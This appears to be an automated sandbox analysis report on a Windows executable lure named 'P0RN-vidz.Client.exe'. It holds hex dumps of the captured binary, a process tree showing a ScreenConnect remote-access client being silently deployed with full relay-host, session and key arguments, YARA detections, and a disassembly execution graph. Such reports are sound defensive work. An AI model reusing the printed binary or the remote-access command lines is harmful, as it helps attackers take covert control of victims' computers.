                                                                                                                                                                                                                                        2024-12-20 17:23:10 UTC16039INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f7 4f c4 cc 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 04 01 00 00 06 00 00 00 00 00 00 1a 22 01 00 00 20 00 00 00 40 01 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 90 a8 01 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELO" 0" @ @
                                                                                                                                                                                                                                        2024-12-20 17:23:10 UTC16384INData Raw: 00 04 25 2d 16 26 02 02 fe 06 8f 00 00 06 73 1b 00 00 0a 25 0a 7d 53 00 00 04 06 28 1a 02 00 0a 2a 36 02 7b 51 00 00 04 16 28 18 00 00 06 2a 1e 02 28 1d 00 00 0a 2a 4e 02 7b 54 00 00 04 28 1b 02 00 0a 14 16 28 1c 02 00 0a 2a 1e 02 28 1d 00 00 0a 2a 00 00 1b 30 07 00 24 01 00 00 2b 00 00 11 73 94 00 00 06 0a 20 d0 07 00 00 28 1d 02 00 0a 06 02 7b 56 00 00 04 7b 0d 00 00 04 6f 32 00 00 06 28 65 00 00 2b 7d 57 00 00 04 02 7b 55 00 00 04 6f 1e 02 00 0a 28 66 00 00 2b 06 7b 58 00 00 04 25 2d 16 26 06 06 fe 06 95 00 00 06 73 1f 02 00 0a 25 0c 7d 58 00 00 04 08 28 67 00 00 2b 6f 20 02 00 0a 0b 2b 28 07 6f 21 02 00 0a 0d 02 7b 56 00 00 04 28 26 00 00 06 73 bb 00 00 0a 25 09 6f 22 02 00 0a 6f bc 00 00 0a 6f 94 00 00 0a 07 6f 11 00 00 0a 2d d0 de 0a 07 2c 06 07 6f
                                                                                                                                                                                                                                        Data Ascii: %-&s%}S(*6{Q(*(*N{T((*(*0$+s ({V{o2(e+}W{Uo(f+{X%-&s%}X(g+o +(o!{V(&s%o"ooo-,o
                                                                                                                                                                                                                                        2024-12-20 17:23:10 UTC16384INData Raw: 13 d9 04 ec 43 80 13 c1 00 c6 3d 92 13 19 04 a9 34 a7 13 31 04 fb 41 a7 13 19 04 10 32 a7 13 31 04 8d 49 ab 13 c9 05 d9 3a 06 00 c9 05 27 40 59 09 29 04 48 46 63 00 c9 05 6a 46 15 00 c9 05 c9 2f 92 06 29 04 4a 19 63 00 c9 05 58 3e 92 06 99 02 64 33 42 06 19 04 bd 2f b8 13 09 07 2c 2d 4e 0a 31 04 71 49 c5 0a 99 07 47 36 9f 0d a1 07 a5 42 e2 13 a4 03 d9 3a a1 00 ac 03 cb 3a 8a 00 b4 03 2f 46 74 00 e1 02 47 15 fb 01 bc 03 cb 3a 8a 00 c4 03 2f 46 74 00 a9 07 d9 3a 06 00 a9 07 a8 3d bb 05 bc 03 60 3f 46 00 e9 02 63 31 b3 03 b1 07 71 31 1b 14 31 04 6b 3b 2a 14 cc 03 d9 3a a1 00 b9 07 a7 1b 3d 14 31 04 3f 23 e0 0a f9 02 07 1d 63 00 a1 01 6b 48 50 14 31 04 25 1d 71 0a 01 03 4c 26 22 02 09 01 a5 2d f8 00 19 04 3c 4a b8 0a 01 03 fd 31 22 02 01 03 23 1c 22 02 31 04
                                                                                                                                                                                                                                        Data Ascii: C=41A21I:'@Y)HFcjF/)JcX>d3B/,-N1qIG6B::/FtG:/Ft:=`?Fc1q11k;*:=1?#ckHP1%qL&"-<J1"#"1
                                                                                                                                                                                                                                        2024-12-20 17:23:10 UTC16384INData Raw: 6e 00 67 65 74 5f 4f 70 74 69 6f 6e 61 6c 44 6f 6d 61 69 6e 00 46 69 78 75 70 41 70 70 44 6f 6d 61 69 6e 00 73 65 74 5f 55 73 65 72 44 6f 6d 61 69 6e 00 3c 33 3e 5f 5f 47 65 74 53 65 73 73 69 6f 6e 55 73 65 72 44 6f 6d 61 69 6e 00 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 55 73 65 72 44 6f 6d 61 69 6e 00 75 73 65 72 44 6f 6d 61 69 6e 00 4a 6f 69 6e 00 55 6e 69 6f 6e 00 47 65 74 54 72 75 65 4f 53 56 65 72 73 69 6f 6e 00 43 6f 72 65 56 65 72 73 69 6f 6e 00 67 65 74 5f 43 72 65 64 65 6e 74 69 61 6c 50 72 6f 76 69 64 65 72 50 72 6f 74 6f 63 6f 6c 56 65 72 73 69 6f 6e 00 50 72 6f 64 75 63 74 56 65 72 73 69 6f 6e 00 57 54 53 4c 6f 67 6f 66 66 53 65 73 73 69 6f 6e 00 57 54 53 44 69 73 63 6f 6e 6e 65 63 74 53 65 73 73 69 6f 6e 00 54 65 6d 70 6f 72 61 72 79 52 65
                                                                                                                                                                                                                                        Data Ascii: nget_OptionalDomainFixupAppDomainset_UserDomain<3>__GetSessionUserDomainauthenticationUserDomainuserDomainJoinUnionGetTrueOSVersionCoreVersionget_CredentialProviderProtocolVersionProductVersionWTSLogoffSessionWTSDisconnectSessionTemporaryRe
                                                                                                                                                                                                                                        2024-12-20 17:23:10 UTC3417INData Raw: 0e 0e 07 20 01 11 80 85 12 7d 05 20 01 02 12 7d 06 20 01 11 71 12 30 07 20 01 11 81 65 12 7d 05 20 01 02 12 61 06 20 01 02 12 81 71 06 20 01 01 12 81 51 16 20 00 15 11 80 cd 03 15 11 80 81 01 08 1d 05 15 11 80 a1 02 0e 0e 0d 20 01 01 15 12 51 02 11 80 85 11 80 85 05 20 00 11 81 55 06 20 01 01 12 81 89 05 20 00 12 81 85 06 20 01 01 12 81 85 05 20 01 01 12 30 05 20 01 0e 1d 05 0b 20 01 02 15 11 80 cd 03 08 0e 0e 0c 20 01 12 61 15 11 80 cd 03 08 0e 0e 04 20 00 12 61 0b 20 01 15 11 80 81 01 11 80 d5 0e 06 20 01 12 81 ad 0e 07 20 02 01 1c 12 81 9d 07 20 01 11 69 12 80 a8 06 20 01 02 12 80 a8 06 20 01 12 80 e1 18 0b 20 01 15 11 80 81 01 11 80 e9 08 09 20 00 15 11 80 a1 02 0e 0e 0e 20 00 15 12 80 e5 01 15 11 80 a1 02 0e 0e 0b 20 01 02 15 11 80 cd 03 0e 0e 09 11
                                                                                                                                                                                                                                        Data Ascii: } } q0 e} a q Q Q U 0 a a i


                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                        Start time:12:22:24
                                                                                                                                                                                                                                        Start date:20/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\P0RN-vidz.Client.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\P0RN-vidz.Client.exe"
                                                                                                                                                                                                                                        Imagebase:0x370000
                                                                                                                                                                                                                                        File size:84'432 bytes
                                                                                                                                                                                                                                        MD5 hash:AF0D6501F817B8769618C6CBCA8B4F65
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                                        Start time:12:22:24
                                                                                                                                                                                                                                        Start date:20/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                                                                                                                                                                                                                                        Imagebase:0x20c24d70000
                                                                                                                                                                                                                                        File size:24'856 bytes
                                                                                                                                                                                                                                        MD5 hash:B4088F44B80D363902E11F897A7BAC09
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.3018986374.0000020C42E70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.3003585301.0000020C26DA7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                        Start time:12:22:25
                                                                                                                                                                                                                                        Start date:20/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                        Start time:12:22:25
                                                                                                                                                                                                                                        Start date:20/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 6780 -ip 6780
                                                                                                                                                                                                                                        Imagebase:0xae0000
                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                        Start time:12:22:25
                                                                                                                                                                                                                                        Start date:20/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 884
                                                                                                                                                                                                                                        Imagebase:0xae0000
                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                        Start time:12:22:25
                                                                                                                                                                                                                                        Start date:20/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                        Start time:12:22:27
                                                                                                                                                                                                                                        Start date:20/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                        Start time:12:23:12
                                                                                                                                                                                                                                        Start date:20/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe"
                                                                                                                                                                                                                                        Imagebase:0xc50000
                                                                                                                                                                                                                                        File size:602'392 bytes
                                                                                                                                                                                                                                        MD5 hash:E1E1E3C901F0DEC41B87113165A30ACB
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000000.2508057514.0000000000C52000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.2530078274.000000001B8E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.2527787169.000000000303D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                        Start time:12:23:13
                                                                                                                                                                                                                                        Start date:20/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=instance-l7g4dh-relay.screenconnect.com&p=443&s=efdde9f7-b36a-4379-90c6-ca6ccaf179c1&k=BgIAAACkAABSU0ExAAgAAAEAAQDVP1a20vKqeqe1KQFemomLm8erwhLpJp1KQnVFAxXxR%2fAz3hz0vYkeQulpCwRe9iWW0dRuBiCd4QvTjxbScJC8nEMvMHnm4MPjY73L4nGpV97oo264zQQyspkhXqNGR2iSOY6rpzvLKPopO9fWOecUGy8yJBQwR0HDB%2bV%2bDADDDeUKlr%2f%2bImJA6eJFZoh3jSThaEua7aIpOZ4Is8GgHX8wrKM81nNiWScf%2b7MB7KKIDRJByiihgKgCgnWSCJjLVCupmRFoab8THk%2fLIjFCP2pmaJw8v7WwUOPs029lZKG3850zwZwC0SO4vLP6yZA1QFVZK7Jr%2fnahgqnKFENgMAm3&r=&i=USTest%20191224%20140" "1"
                                                                                                                                                                                                                                        Imagebase:0x80000
                                                                                                                                                                                                                                        File size:95'512 bytes
                                                                                                                                                                                                                                        MD5 hash:0282251F1E4AF3F721D7192118A8FD2F
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                        Start time:12:23:13
                                                                                                                                                                                                                                        Start date:20/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=instance-l7g4dh-relay.screenconnect.com&p=443&s=efdde9f7-b36a-4379-90c6-ca6ccaf179c1&k=BgIAAACkAABSU0ExAAgAAAEAAQDVP1a20vKqeqe1KQFemomLm8erwhLpJp1KQnVFAxXxR%2fAz3hz0vYkeQulpCwRe9iWW0dRuBiCd4QvTjxbScJC8nEMvMHnm4MPjY73L4nGpV97oo264zQQyspkhXqNGR2iSOY6rpzvLKPopO9fWOecUGy8yJBQwR0HDB%2bV%2bDADDDeUKlr%2f%2bImJA6eJFZoh3jSThaEua7aIpOZ4Is8GgHX8wrKM81nNiWScf%2b7MB7KKIDRJByiihgKgCgnWSCJjLVCupmRFoab8THk%2fLIjFCP2pmaJw8v7WwUOPs029lZKG3850zwZwC0SO4vLP6yZA1QFVZK7Jr%2fnahgqnKFENgMAm3&r=&i=USTest%20191224%20140" "1"
                                                                                                                                                                                                                                        Imagebase:0x80000
                                                                                                                                                                                                                                        File size:95'512 bytes
                                                                                                                                                                                                                                        MD5 hash:0282251F1E4AF3F721D7192118A8FD2F
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                        Start time:12:23:14
                                                                                                                                                                                                                                        Start date:20/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe" "RunRole" "1cec62b5-23ad-4984-ac47-8ca096d23ddd" "User"
                                                                                                                                                                                                                                        Imagebase:0x4d0000
                                                                                                                                                                                                                                        File size:602'392 bytes
                                                                                                                                                                                                                                        MD5 hash:E1E1E3C901F0DEC41B87113165A30ACB
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:2.1%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:3.8%
                                                                                                                                                                                                                                          Total number of Nodes:1465
                                                                                                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                                                                                                          execution_graph 5977 376176 5980 37617b 5977->5980 5979 37619e 5980->5979 5981 375da6 5980->5981 5982 375db3 5981->5982 5983 375dd5 5981->5983 5984 375dc1 DeleteCriticalSection 5982->5984 5985 375dcf 5982->5985 5983->5980 5984->5984 5984->5985 5986 3749b9 _free 15 API calls 5985->5986 5986->5983 6770 375cf6 6771 375d27 6770->6771 6773 375d01 6770->6773 6772 375d11 FreeLibrary 6772->6773 6773->6771 6773->6772 5773 373535 5774 373547 5773->5774 5776 37354d 5773->5776 5777 3734c6 5774->5777 5778 3734f0 5777->5778 5779 3734d3 5777->5779 5778->5776 5780 3734ea 5779->5780 5781 3749b9 _free 15 API calls 5779->5781 5782 3749b9 _free 15 API calls 5780->5782 5781->5779 5782->5778 5783 378e31 5784 378e51 5783->5784 5787 378e88 5784->5787 5786 378e7b 5789 378e8f 5787->5789 5788 378ef0 5791 3799de 5788->5791 5796 379ae7 5788->5796 5789->5788 5793 378eaf 5789->5793 5791->5786 5793->5791 5794 379ae7 16 API calls 5793->5794 5795 379a0e 5794->5795 5795->5786 5797 379af0 5796->5797 5800 37a1bf 5797->5800 5799 378f3e 5799->5786 5801 37a1fe __startOneArgErrorHandling 5800->5801 5804 37a280 __startOneArgErrorHandling 5801->5804 5806 37a5c2 5801->5806 5805 37a2b6 _ValidateLocalCookies 5804->5805 5809 37a8d6 5804->5809 5805->5799 5816 37a5e5 5806->5816 5810 37a8e3 5809->5810 5811 37a8f8 5809->5811 5813 374949 _free 15 API calls 5810->5813 5814 37a8fd 5810->5814 5812 374949 _free 15 API calls 5811->5812 5812->5814 5815 37a8f0 5813->5815 5814->5805 5815->5805 5817 37a610 __raise_exc 5816->5817 5818 37a809 RaiseException 5817->5818 5819 37a5e0 5818->5819 5819->5804 6774 3757f1 6775 3757fc 6774->6775 6776 375b03 6 API calls 6775->6776 6777 375825 6775->6777 6779 375821 6775->6779 6776->6775 6780 375849 6777->6780 6781 375856 6780->6781 6783 375875 6780->6783 6782 375860 DeleteCriticalSection 6781->6782 6782->6782 6782->6783 6783->6779 6618 3792b0 6621 3792ce 6618->6621 6620 3792c6 6625 3792d3 6621->6625 6622 379b23 16 API calls 6623 3794ff 6622->6623 6623->6620 6624 379368 6624->6620 6625->6622 6625->6624 5987 37467d 5995 3759a8 5987->5995 5989 374687 5990 3745f8 _free 15 API calls 5989->5990 5994 374691 5989->5994 5991 374699 5990->5991 5992 3746a6 5991->5992 6000 3746a9 5991->6000 5996 375891 _abort 5 API calls 5995->5996 5997 3759cf 5996->5997 5998 3759e7 TlsAlloc 5997->5998 5999 3759d8 _ValidateLocalCookies 5997->5999 5998->5999 5999->5989 6001 3746b3 6000->6001 6002 3746b9 6000->6002 6004 3759fe 6001->6004 6002->5994 6005 375891 _abort 5 API calls 6004->6005 6006 375a25 6005->6006 6007 375a3d TlsFree 6006->6007 6008 375a31 _ValidateLocalCookies 6006->6008 6007->6008 6008->6002 5820 379d3b 5821 379d54 __startOneArgErrorHandling 5820->5821 5823 379d7d __startOneArgErrorHandling 5821->5823 5824 37a314 5821->5824 5825 37a34d __startOneArgErrorHandling 5824->5825 5826 37a5e5 __raise_exc RaiseException 5825->5826 5827 37a374 __startOneArgErrorHandling 5825->5827 5826->5827 5828 37a3b7 5827->5828 5829 37a392 5827->5829 5830 37a8d6 __startOneArgErrorHandling 15 API calls 5828->5830 5833 37a905 5829->5833 5832 37a3b2 __startOneArgErrorHandling _ValidateLocalCookies 5830->5832 5832->5823 5834 37a914 5833->5834 5835 37a988 __startOneArgErrorHandling 5834->5835 5837 37a933 __startOneArgErrorHandling 5834->5837 5836 37a8d6 __startOneArgErrorHandling 15 API calls 5835->5836 5839 37a981 5836->5839 5838 37a8d6 __startOneArgErrorHandling 15 API calls 5837->5838 5837->5839 5838->5839 5839->5832 6626 3714bb IsProcessorFeaturePresent 6627 3714d0 6626->6627 6630 371493 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6627->6630 6629 3715b3 6630->6629 6784 3712fb 6789 371aad SetUnhandledExceptionFilter 6784->6789 6786 371300 6790 373a49 6786->6790 6788 37130b 6789->6786 6791 373a55 6790->6791 6792 373a6f 6790->6792 6791->6792 6793 374949 _free 15 API calls 6791->6793 6792->6788 6794 373a5f 6793->6794 6795 37488d _abort 21 API calls 6794->6795 6796 373a6a 6795->6796 6796->6788 6631 371ab9 6632 371af0 6631->6632 6633 371acb 6631->6633 6633->6632 6640 3721ea 6633->6640 6638 373fd9 33 API calls 6639 371b0e 6638->6639 6641 372513 43 API calls 6640->6641 6642 371afd 6641->6642 6643 3721f3 6642->6643 6644 372513 43 API calls 6643->6644 6645 371b07 6644->6645 6645->6638 6646 3730a3 6647 3730b2 6646->6647 6648 3730ce 6646->6648 6647->6648 6649 3730b8 6647->6649 6650 37537b 46 API calls 6648->6650 6651 374949 _free 15 API calls 6649->6651 6652 3730d5 GetModuleFileNameA 6650->6652 6653 3730bd 6651->6653 6654 3730f9 6652->6654 6655 37488d _abort 21 API calls 6653->6655 6669 3731c7 6654->6669 6657 3730c7 6655->6657 6659 37333c 15 API calls 6660 373123 6659->6660 6661 37312c 6660->6661 6662 373138 6660->6662 6663 374949 _free 15 API calls 6661->6663 6664 3731c7 33 API calls 6662->6664 6668 373131 6663->6668 6666 37314e 6664->6666 6665 3749b9 _free 15 API calls 6665->6657 6667 3749b9 _free 15 API calls 6666->6667 6666->6668 6667->6668 6668->6665 6671 3731ec 6669->6671 6670 375706 33 API calls 6670->6671 6671->6670 6673 37324c 6671->6673 6672 373116 6672->6659 6673->6672 6674 375706 33 API calls 6673->6674 6674->6673 6797 3769e3 GetProcessHeap 6675 3774a1 6676 3774ae 6675->6676 6677 37495c _abort 15 API calls 6676->6677 6678 3774c8 6677->6678 6679 3749b9 _free 15 API calls 6678->6679 6680 3774d4 6679->6680 6681 37495c _abort 15 API calls 6680->6681 6685 3774fa 6680->6685 6682 3774ee 6681->6682 6684 3749b9 _free 15 API calls 6682->6684 6683 375b03 6 API calls 6683->6685 6684->6685 6685->6683 6686 377506 6685->6686 5840 376120 5841 37612c ___scrt_is_nonwritable_in_current_image 5840->5841 5852 375832 EnterCriticalSection 5841->5852 5843 376133 5853 375ddb 5843->5853 5845 376142 5846 376151 5845->5846 5866 375fb4 GetStartupInfoW 5845->5866 5877 37616d 5846->5877 5850 376162 _abort 5852->5843 5854 375de7 ___scrt_is_nonwritable_in_current_image 5853->5854 5855 375df4 5854->5855 5856 375e0b 5854->5856 5858 374949 _free 15 API calls 5855->5858 5880 375832 EnterCriticalSection 5856->5880 5859 375df9 5858->5859 5860 37488d _abort 21 API calls 5859->5860 5861 375e03 _abort 5860->5861 5861->5845 5862 375e43 5888 375e6a 5862->5888 5865 375e17 5865->5862 5881 375d2c 5865->5881 5867 375fd1 5866->5867 5869 376063 5866->5869 5868 375ddb 22 API calls 5867->5868 5867->5869 5870 375ffa 5868->5870 5872 37606a 5869->5872 5870->5869 5871 376028 GetFileType 5870->5871 5871->5870 5873 376071 5872->5873 5874 3760b4 GetStdHandle 5873->5874 5875 37611c 5873->5875 5876 3760c7 GetFileType 5873->5876 5874->5873 5875->5846 5876->5873 5897 37587a LeaveCriticalSection 5877->5897 5879 376174 5879->5850 5880->5865 5882 37495c _abort 15 API calls 5881->5882 5887 375d3e 5882->5887 5883 375d4b 5884 3749b9 _free 15 API calls 5883->5884 5886 375d9d 5884->5886 5886->5865 5887->5883 5891 375b03 5887->5891 5896 37587a LeaveCriticalSection 5888->5896 5890 375e71 5890->5861 5892 375891 _abort 5 API calls 5891->5892 5893 375b2a 5892->5893 5894 375b48 InitializeCriticalSectionAndSpinCount 5893->5894 5895 375b33 _ValidateLocalCookies 5893->5895 5894->5895 5895->5887 5896->5890 5897->5879 6009 377b60 6012 377b77 6009->6012 6013 377b85 6012->6013 6014 377b99 6012->6014 6015 374949 _free 15 API calls 6013->6015 6016 377bb3 6014->6016 6017 377ba1 6014->6017 6018 377b8a 6015->6018 6022 3740c2 __fassign 33 